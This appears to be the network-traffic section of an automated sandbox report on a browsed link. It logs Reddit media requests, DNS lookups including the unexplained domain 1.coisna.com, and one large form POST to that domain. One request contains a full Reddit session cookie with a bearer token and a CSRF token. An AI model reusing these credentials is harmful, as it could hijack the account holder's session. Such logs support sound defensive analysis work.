Source: global trafficHTTP traffic detected: GET /b8ne5kcj9ewe1/DASH_96.mp4 HTTP/1.1Host: v.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"Accept-Encoding: identity;q=1, *;q=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: videoSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Language: en-US,en;q=0.9Range: bytes=0-
Source: global trafficHTTP traffic detected: GET /br30p44xcdwe1/DASH_96.mp4 HTTP/1.1Host: v.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"Accept-Encoding: identity;q=1, *;q=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: videoSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Language: en-US,en;q=0.9Range: bytes=0-
Source: global trafficHTTP traffic detected: GET /m1lypa16y7we1/HLS_480.m3u8 HTTP/1.1Host: v.redd.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /m1lypa16y7we1/HLS_AUDIO_128.m3u8 HTTP/1.1Host: v.redd.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /maga-why-does-it-bother-you-so-much-to-be-called-a-n-zi-v0-gjjgh5785bwe1.jpeg?width=320&crop=smart&auto=webp&s=e801759d9fbf801535fb7400978abc18a0457a45 HTTP/1.1Host: preview.redd.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /m1lypa16y7we1/HLS_480.ts HTTP/1.1Host: v.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0CMCD-Object: br=1138,d=4867,ot=v,tb=1138User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36CMCD-Session: cid="m1lypa16y7we1",sf=h,sid="acda2db8-2299-486c-b972-814495665bfd"CMCD-Request: mtp=2000,suAccept: */*Origin: https://www.reddit.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.reddit.com/Accept-Encoding: identityAccept-Language: en-US,en;q=0.9Range: bytes=0-561555
Source: global trafficHTTP traffic detected: GET /m1lypa16y7we1/HLS_AUDIO_128.aac HTTP/1.1Host: v.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0CMCD-Object: br=801,d=4011,ot=aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36CMCD-Session: cid="m1lypa16y7we1",sf=h,sid="acda2db8-2299-486c-b972-814495665bfd"CMCD-Request: mtp=2000,suAccept: */*Origin: https://www.reddit.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.reddit.com/Accept-Encoding: identityAccept-Language: en-US,en;q=0.9Range: bytes=0-92683
Source: global trafficHTTP traffic detected: GET /recaptcha/enterprise/webworker.js?hl=en&v=w0_qmZVSdoaCDsP7iM_WT86D HTTP/1.1Host: www.google.comConnection: keep-aliveAccept: */*X-Browser-Channel: stableX-Browser-Year: 2025X-Browser-Validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=X-Browser-Copyright: Copyright 2025 Google LLC. All rights reserved.X-Client-Data: CLbgygE=Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerSec-Fetch-Storage-Access: activeReferer: https://www.google.com/recaptcha/enterprise/anchor?ar=1&k=6LcZL1spAAAAAIzQl_DXGakd-J2uwjnfZas9G-Rj&co=aHR0cHM6Ly93d3cucmVkZGl0LmNvbTo0NDM.&hl=en&v=w0_qmZVSdoaCDsP7iM_WT86D&size=invisible&cb=mzmsb4vbyjowUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /svc/shreddit/events HTTP/1.1Host: www.reddit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: rdt=f141fda34bbc28d220dd95ca654729b5; edgebucket=A7pEG7LhumUcimytWF; loid=000000001nuyrg96hz.2.1745344514857.Z0FBQUFBQm9COWdDbEdFZW5DdHR6SXBESUs3MjdrYnZCMDh1bV90RnZISVRhSDluMlN1STFiQjFFUEFpN1BBMTJtQ2tuNmR2SEhPUDRNNmNnbGloeE5JbUh1T3NWM3VXdTJ1WVl3cVVCQ2FOeG5EUE1QTXZZaU1jLWhWeTJnU1B4eGJmVUJKVXNxTFE; csrf_token=bc2c05c73ac370d65940c9a0c8742cb4; token_v2=eyJhbGciOiJSUzI1NiIsImtpZCI6IlNIQTI1NjpzS3dsMnlsV0VtMjVmcXhwTU40cWY4MXE2OWFFdWFyMnpLMUdhVGxjdWNZIiwidHlwIjoiSldUIn0.eyJzdWIiOiJsb2lkIiwiZXhwIjoxNzQ1NDMwOTE0Ljg1NzU5MywiaWF0IjoxNzQ1MzQ0NTE0Ljg1NzU5MywianRpIjoiTFlUZ0dRY3cwWUV2aTBPY3lEQnY5Z3JqVnpvN2h3IiwiY2lkIjoiMFItV0FNaHVvby1NeVEiLCJsaWQiOiJ0Ml8xbnV5cmc5Nmh6IiwibGNhIjoxNzQ1MzQ0NTE0ODU3LCJzY3AiOiJlSnhra2RHT3REQUloZC1GYTVfZ2Y1VV9tMDF0Y1lhc0xRYW9rM243RFZvY2s3MDdjRDRwSFA5REtvcUZEQ1pYZ3FuQUJGZ1RyVERCUnVUOW5MbTNnMmlOZTh0WXNabkNCRm13RkRya21MR3NpUVFtZUpJYXl4c21vSUxOeUZ5dXRHTk5MVDBRSnFoY01yZUZIcGMyb2JrYmk1NmRHRlc1ckR5b3NWZmwwdGpHRkxZbnhqY2JxdzJwdUM2bk1rbkxRdmtzWHZUak45VzM5dm16X1NhMEo4T0txdW1CM2hsSkNHNHNmcGltM2Q5VGs1NnRDeGExOTNxUTJ1ZDYzSzU5MWl3ME83ZWY2X2xySXhtWFkyaC1KdnQzMXktaEE0ODhMelBxQUVhczRVY1pkbVFkX2xVSFVMbWdKR01KNHRNSTVNcmwyMzhKdG12VHY4YnRFejk4TS1LbU5feldETlJ6Q2VMUXBfSDFHd0FBX184UTFlVFIiLCJmbG8iOjF9.XL7oIg3MwKheG_ccxTL7Kp6WHBk4VVCLT3AdIZK0PL9rzXFg7esuRkQA3gxm6FqE_RO3OV2TEpCdGXucr_u_2AI3m0Q__HV4Fc74jpHiSc9SK61g2OU-d5gwNX7RsLZ44fYWYHs6U9lR6N-TyAdgC7GrAkPPtrvCs8qbDuzNfqOjoMhQSN_ccE9B_mv_jpdmy_iOOLyEg42MU0XZ_fe8oQFufFlemtk0Ildlc1PG3s-ldYjnw1CDYD-IseokcGbETMLViJnLjc_fQ4wfhJwSB8xzaQMoPX7eUu61t9nqwIZv6yun2ASiBTbc8Y7fVC1Qx-NVzBanvAvnWi9pgm3wtQ; csv=2; session_tracker=brgcmaqpjfinlpaqdm.0.1745344542558.Z0FBQUFBQm9COWdlYTloNGdGdWU0c1M4X3A1eTdqTWJzUEhFV2hDRnRxYnlyWnZwMVNWSGtTZ1hHUHVNT2p5N1dJdmZpc3g5WElCX0ZFVE04cm1OeFpTZ0ZZMy1SUjVPZVE4MTNmWEw4bDBhU2g5UWVNOVYza1NWMEZtMnpqZzB2Z2lNd3phOFh5WlM
Source: global trafficHTTP traffic detected: GET /shreddit/assets/favicon/manifest.json HTTP/1.1Host: www.redditstatic.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://www.reddit.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /m1lypa16y7we1/HLS_AUDIO_128.aac HTTP/1.1Host: v.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0CMCD-Object: br=801,d=4011,ot=aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36CMCD-Session: cid="m1lypa16y7we1",sf=h,sid="acda2db8-2299-486c-b972-814495665bfd"CMCD-Request: bl=3900,mtp=2000,suAccept: */*Origin: https://www.reddit.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.reddit.com/Accept-Encoding: identityAccept-Language: en-US,en;q=0.9Range: bytes=92684-181607If-Range: "1b4cb9263b1987f2523b696907f56f57"
Source: global trafficHTTP traffic detected: GET /m1lypa16y7we1/HLS_480.ts HTTP/1.1Host: v.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0CMCD-Object: br=1138,d=4100,ot=v,tb=1138User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36CMCD-Session: cid="m1lypa16y7we1",sf=h,sid="acda2db8-2299-486c-b972-814495665bfd"CMCD-Request: bl=4900,mtp=8600,suAccept: */*Origin: https://www.reddit.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.reddit.com/Accept-Encoding: identityAccept-Language: en-US,en;q=0.9Range: bytes=561556-1050167If-Range: "347a9561ace7d0497adbba9cf98361b7"
Source: global trafficDNS traffic detected: DNS query: yhp1b2pb.r.us-east-1.awstrack.me
Source: global trafficDNS traffic detected: DNS query: urldefense.proofpoint.com
Source: global trafficDNS traffic detected: DNS query: 1.coisna.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: reddit.com
Source: global trafficDNS traffic detected: DNS query: www.reddit.com
Source: global trafficDNS traffic detected: DNS query: www.redditstatic.com
Source: global trafficDNS traffic detected: DNS query: preview.redd.it
Source: global trafficDNS traffic detected: DNS query: styles.redditmedia.com
Source: global trafficDNS traffic detected: DNS query: external-preview.redd.it
Source: global trafficDNS traffic detected: DNS query: b.thumbs.redditmedia.com
Source: global trafficDNS traffic detected: DNS query: emoji.redditmedia.com
Source: global trafficDNS traffic detected: DNS query: id.rlcdn.com
Source: global trafficDNS traffic detected: DNS query: w3-reporting.reddit.com
Source: global trafficDNS traffic detected: DNS query: ad-delivery.net
Source: global trafficDNS traffic detected: DNS query: alb.reddit.com
Source: global trafficDNS traffic detected: DNS query: v.redd.it
Source: global trafficDNS traffic detected: DNS query: i.redd.it
Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 1.coisna.comConnection: keep-aliveContent-Length: 146428Cache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Origin: https://1.coisna.comContent-Type: application/x-www-form-urlencodedUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://1.coisna.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _cid=0132c76c1ea21d2ec23ebe773a758c79
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 22 Apr 2025 17:55:10 GMTContent-Type: text/htmlContent-Length: 548Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 13Server: VarnishRetry-After: 0Content-Type: text/plainAccept-Ranges: bytesDate: Tue, 22 Apr 2025 17:55:36 GMTVia: 1.1 varnishStrict-Transport-Security: max-age=31536000; includeSubdomainsX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=block
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
